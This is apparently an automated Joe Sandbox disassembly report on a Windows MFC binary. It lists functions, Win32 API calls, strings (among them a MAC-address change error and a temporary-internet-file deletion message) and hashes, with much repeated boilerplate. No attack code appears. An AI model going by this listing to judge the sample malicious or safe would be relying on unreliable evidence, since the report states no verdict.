                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: MessageSend$Open
                                • String ID: ($)$0000$Default$SYSTEM\CurrentControlSet\Control\Keyboard Layouts\$SYSTEM\CurrentControlSet\Control\Nls\Language
                                • API String ID: 1554988408-487650185
                                • Opcode ID: e2043e2506104ae5d6c811f734f8f202e9f768df778a98a85b5ff77156bb7f8c
                                • Instruction ID: c4091e44bddb758ac13fe4f631b60d438c76e1330555841b1ac334d37b406dde
                                • Opcode Fuzzy Hash: e2043e2506104ae5d6c811f734f8f202e9f768df778a98a85b5ff77156bb7f8c
                                • Instruction Fuzzy Hash: 49B1BF70204B418FD714CF28C885B9AB3E1BF99324F148B5DF8A98B2D5DB74E805CB96
                                Function 0045875C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00458761
                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 00458779
                                • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 004587D7
                                  • Part of subcall function 00457CE7: GetWindowRect.USER32(?,?), ref: 00457D0C
                                  • Part of subcall function 00457CE7: GetWindow.USER32(?,00000004), ref: 00457D29
                                • SetWindowLongA.USER32(?,000000FC,?), ref: 00458807
                                • RemovePropA.USER32(?,AfxOldWndProc423), ref: 0045880F
                                • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00458816
                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 0045881D
                                  • Part of subcall function 00456D25: GetWindowRect.USER32(?,753BFA40), ref: 00456D31
                                • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 00458871
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                • String ID: AfxOldWndProc423
                                • API String ID: 2397448395-1060338832
                                • Opcode ID: ee32eedb63964a5dd1226f40263de8d8339820295a72ce44033982a908a94c62
                                • Instruction ID: ca612bbd6e85d40e054d0ae89126da5a4b03999a9a8927983b9c67bc9c87c1df
                                • Opcode Fuzzy Hash: ee32eedb63964a5dd1226f40263de8d8339820295a72ce44033982a908a94c62
                                • Instruction Fuzzy Hash: 6D31A032800209BBCB01AFA5ED49DBF7B79EF49312F00042EF902B1162DB785914DB6A
                                Function 00460769 Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(004D90EC,76F90A60,?,?,004D90D0,004D90D0,?,00460CA5,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845), ref: 0046077A
                                • GlobalAlloc.KERNEL32(00000002,00000040,?,?,004D90D0,004D90D0,?,00460CA5,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845), ref: 004607CB
                                • GlobalHandle.KERNEL32(008408B8), ref: 004607D4
                                • GlobalUnlock.KERNEL32(00000000), ref: 004607DE
                                • GlobalReAlloc.KERNEL32(?,00000040,00002002), ref: 004607F2
                                • GlobalHandle.KERNEL32(008408B8), ref: 00460804
                                • GlobalLock.KERNEL32(00000000), ref: 0046080B
                                • LeaveCriticalSection.KERNEL32(?,?,?,004D90D0,004D90D0,?,00460CA5,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845,76F90A60), ref: 00460814
                                • GlobalLock.KERNEL32(00000000), ref: 00460820
                                • LeaveCriticalSection.KERNEL32(?), ref: 00460868
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                • String ID:
                                • API String ID: 2667261700-0
                                • Opcode ID: be79cf1a9f2181cbec1607a2a329ba81d75bccc53450a23c6bad1a00fdc60394
                                • Instruction ID: 24ed6f489e8cae63526faeb7cf58e8366cea2fd9f1ea75441c28e41bb40b13db
                                • Opcode Fuzzy Hash: be79cf1a9f2181cbec1607a2a329ba81d75bccc53450a23c6bad1a00fdc60394
                                • Instruction Fuzzy Hash: 94317A70A00B04AFC720DF69C848A5BBBF9FF84345B00496EE456D3620EBB4FA44CB55
                                Function 00455D4E Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00455D53
                                • GetSystemMetrics.USER32(0000002A), ref: 00455E17
                                • GlobalLock.KERNEL32(00000000), ref: 00455E82
                                • CreateDialogIndirectParamA.USER32(?,?,?,Function_000557E8,00000000), ref: 00455EB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                • String ID: MS Shell Dlg
                                • API String ID: 2364537584-76309092
                                • Opcode ID: d6fb0734ffe8960c20dabb1c74e8d860021aef1a8b9addf3007b9fd67b8e9ffa
                                • Instruction ID: 60737eb939981e1663e8655a045ed5a825c3ec766cbfdbfa92d2e0a2365db7d1
                                • Opcode Fuzzy Hash: d6fb0734ffe8960c20dabb1c74e8d860021aef1a8b9addf3007b9fd67b8e9ffa
                                • Instruction Fuzzy Hash: 6F51C131900605DFCB10EFA4C89A9FEBBB5EF44316F14456BF802A7292D7794E48CB99
                                Function 0043C4F0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 164windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetClientRect.USER32(?,?), ref: 0043C549
                                • PtInRect.USER32(?,00000000,?), ref: 0043C556
                                • SendMessageA.USER32(?,000002A3,?,?), ref: 0043C582
                                • _TrackMouseEvent.COMCTL32 ref: 0043C5B2
                                • GetClientRect.USER32(?,?), ref: 0043C653
                                • PtInRect.USER32(?,00000000,?), ref: 0043C660
                                • CallWindowProcA.USER32(?,?,?,?,?), ref: 0043C6F0
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Rect$Client$CallEventMessageMouseProcSendTrackWindow
                                • String ID: (sM
                                • API String ID: 3515703253-3311458642
                                • Opcode ID: cdbe1d2f7b305334a9fd7dbe55b7a79721ce0a0584e9aa8bf68790838a640f28
                                • Instruction ID: 8c3f4903dc8baf6d121fe7fb3753f05e18b3a4cd0aa498f358327e813194e9bc
                                • Opcode Fuzzy Hash: cdbe1d2f7b305334a9fd7dbe55b7a79721ce0a0584e9aa8bf68790838a640f28
                                • Instruction Fuzzy Hash: 6451C372604210ABC710DB19CCC8E6BB7E9EBC9310F04592FF94697291E739ED05CB6A
                                Function 0042D080 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 106windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 0042D0B4
                                • GetLogicalDrives.KERNEL32 ref: 0042D0B6
                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 0042D129
                                • SendMessageA.USER32(?,00000151,?,-00000041), ref: 0042D13D
                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0042D188
                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0042D19A
                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0042D1AB
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: MessageSend$DrivesLogical
                                • String ID: %c:\
                                • API String ID: 501861121-3142399695
                                • Opcode ID: 195e983572fe163143436136a0c3a57196b6e27e3f640e6ba4a67512ad92c815
                                • Instruction ID: 9dc9e9830e61ed712b0ca2553cde3fd99fe03222a10af47223d38b0de3f2946a
                                • Opcode Fuzzy Hash: 195e983572fe163143436136a0c3a57196b6e27e3f640e6ba4a67512ad92c815
                                • Instruction Fuzzy Hash: FB31CF71700711ABD600CF28CC81F5BF7A8FB88720F108A19F5599B2D1CBB8E8058BE5
                                Function 00460F91 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 00460FD2
                                • PathFindExtensionA.SHLWAPI(?), ref: 00460FEC
                                • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00461086
                                • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004610B3
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ExtensionFileFindModuleNamePathlstrcatlstrcpy
                                • String ID: .CHM$.HLP$.INI
                                • API String ID: 2140653559-4017452060
                                • Opcode ID: d61ad15ca87f6a7e6e9c15fe4987d482b5de92941cd876a8ebf14581f8cd0a80
                                • Instruction ID: b47048ef5958d033ffe7bf5904ed0b4a0b0cffc92f540df513db9c3eee53b71e
                                • Opcode Fuzzy Hash: d61ad15ca87f6a7e6e9c15fe4987d482b5de92941cd876a8ebf14581f8cd0a80
                                • Instruction Fuzzy Hash: 04413B719007489FDF70DF66D884ADB77E8AB08344F14482BE946C6651FB78D984CB26
                                Function 0045BE9D Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 0045BEAA
                                • GetSystemMetrics.USER32(0000000C), ref: 0045BEB1
                                • GetSystemMetrics.USER32(00000002), ref: 0045BEB8
                                • GetSystemMetrics.USER32(00000003), ref: 0045BEC2
                                • GetDC.USER32(00000000), ref: 0045BECC
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0045BEDD
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045BEE5
                                • ReleaseDC.USER32(00000000,00000000), ref: 0045BEED
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                • String ID:
                                • API String ID: 1031845853-0
                                • Opcode ID: 82800fdedd8725303c786ebbd9317c47ed0af43c279096a4199732bebe051ac8
                                • Instruction ID: b07b7a82b072b39a71f8a96b90e28bccc6b23350fc1b81c5107f06a5aa9eb94c
                                • Opcode Fuzzy Hash: 82800fdedd8725303c786ebbd9317c47ed0af43c279096a4199732bebe051ac8
                                • Instruction Fuzzy Hash: 36F03071A40B04AEE7206F71AC4DF2B7BA4EB85B61F01452AE6428B2D0DBB59C018F54
                                Function 0042F9A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 147windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 0042FA06
                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 0042FA99
                                • SendMessageA.USER32(?,00000151,00000000,?), ref: 0042FAB1
                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0042FAC9
                                  • Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                  • Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E
                                  • Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF
                                Strings
                                • Have no usable adapters, MAC Address can't Modify!, xrefs: 0042FAEE
                                • Error, xrefs: 0042FAE9
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Message$Send$CallbackDispatcherItemUser
                                • String ID: Error$Have no usable adapters, MAC Address can't Modify!
                                • API String ID: 670485088-1610973038
                                • Opcode ID: 64ba300292b3db6ed030f1794b6d82e1f6d5c0e80a847244029c72630f60c34a
                                • Instruction ID: 26f2146aec7202859a8a0788ea455b2750414a0d6ce9a465af84665d90ab2efc
                                • Opcode Fuzzy Hash: 64ba300292b3db6ed030f1794b6d82e1f6d5c0e80a847244029c72630f60c34a
                                • Instruction Fuzzy Hash: 43410DB1344700EBD721DB25CC82F9BB7E9ABD4704F40092EF59A973C2DA78A909C759
                                Function 004029A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                • FindFirstUrlCacheEntryA.WININET(00000000,00000000,?), ref: 00402A03
                                • FindNextUrlCacheEntryA.WININET(00000000,00000000,?), ref: 00402A1B
                                • GetLastError.KERNEL32 ref: 00402A29
                                • DeleteUrlCacheEntry.WININET(?), ref: 00402A96
                                • FindCloseUrlCache.WININET(00000000), ref: 00402B14
                                Strings
                                • There is an error (%d) when trying deleting temporary internet files., xrefs: 00402ACA
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Cache$EntryFind$CloseDeleteErrorFirstLastNext
                                • String ID: There is an error (%d) when trying deleting temporary internet files.
                                • API String ID: 2077925056-841692006
                                • Opcode ID: 91c8082cfd02f721169656c60f1eef05379fc8cc86d5905a9375c55cfa756d04
                                • Instruction ID: 94eec7699a4fa6117de3be0bb099d12cbcff65c4a93994e37f97ae03476e8131
                                • Opcode Fuzzy Hash: 91c8082cfd02f721169656c60f1eef05379fc8cc86d5905a9375c55cfa756d04
                                • Instruction Fuzzy Hash: 9341B8712047019FC310DF55C948A1BB7E9BB85325F144B3EF456A32D1EBB8D805CB5A
                                Function 0045723F Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetParent.USER32(?), ref: 0045726D
                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00457294
                                • UpdateWindow.USER32(?), ref: 004572AE
                                • SendMessageA.USER32(?,00000121,00000000,?), ref: 004572D2
                                • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 004572EC
                                • UpdateWindow.USER32(?), ref: 00457332
                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00457366
                                  • Part of subcall function 0045982D: GetWindowLongA.USER32(?,000000F0), ref: 00459838
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Message$Window$PeekSendUpdate$LongParent
                                • String ID:
                                • API String ID: 2853195852-0
                                • Opcode ID: 9e8f7087b82af985ab798514f66e41ff7fa4c330841c0b124aedac182aa905d9
                                • Instruction ID: 32369ea9d48cbdeecc609184201b7489618483d9b436833af93530d3bdef152a
                                • Opcode Fuzzy Hash: 9e8f7087b82af985ab798514f66e41ff7fa4c330841c0b124aedac182aa905d9
                                • Instruction Fuzzy Hash: 2941C130108741ABD7319F26AC45A1FBAF4EBC1716F100A7EFC81416A2DB69C84DC65A
                                Function 0043C700 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetClientRect.USER32(?,?), ref: 0043C733
                                • PtInRect.USER32(?,?,?), ref: 0043C740
                                • SendMessageA.USER32(?,000002A3,?,?), ref: 0043C757
                                • _TrackMouseEvent.COMCTL32 ref: 0043C787
                                • CallWindowProcA.USER32(?,?,?,?,?), ref: 0043C803
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Rect$CallClientEventMessageMouseProcSendTrackWindow
                                • String ID: (sM
                                • API String ID: 1649741670-3311458642
                                • Opcode ID: b0d427d859c20ecab4461198b410d0e46f96276c2dd783494e8c7bae7b6a58f4
                                • Instruction ID: 898cb067ecc559f41ab13f6a3b788ad7c7261948081919be5936e31082410bb8
                                • Opcode Fuzzy Hash: b0d427d859c20ecab4461198b410d0e46f96276c2dd783494e8c7bae7b6a58f4
                                • Instruction Fuzzy Hash: 5921D071209301AFD310DF54DC88E6B77A9EB8D324F40192EF95697281E778D9098BAB
                                Function 004610DF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • SetErrorMode.KERNEL32(00000000,00000000,0045C864,?,?,?,?,76F90A60,00000000,?,00448293,00000000), ref: 004610E8
                                • SetErrorMode.KERNEL32(00000000,?,00448293,00000000), ref: 004610F0
                                • GetModuleHandleA.KERNEL32(user32.dll,00448293,00000000), ref: 0046113B
                                • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0046114B
                                  • Part of subcall function 00460F91: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 00460FD2
                                  • Part of subcall function 00460F91: PathFindExtensionA.SHLWAPI(?), ref: 00460FEC
                                  • Part of subcall function 00460F91: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00461086
                                  • Part of subcall function 00460F91: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004610B3
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
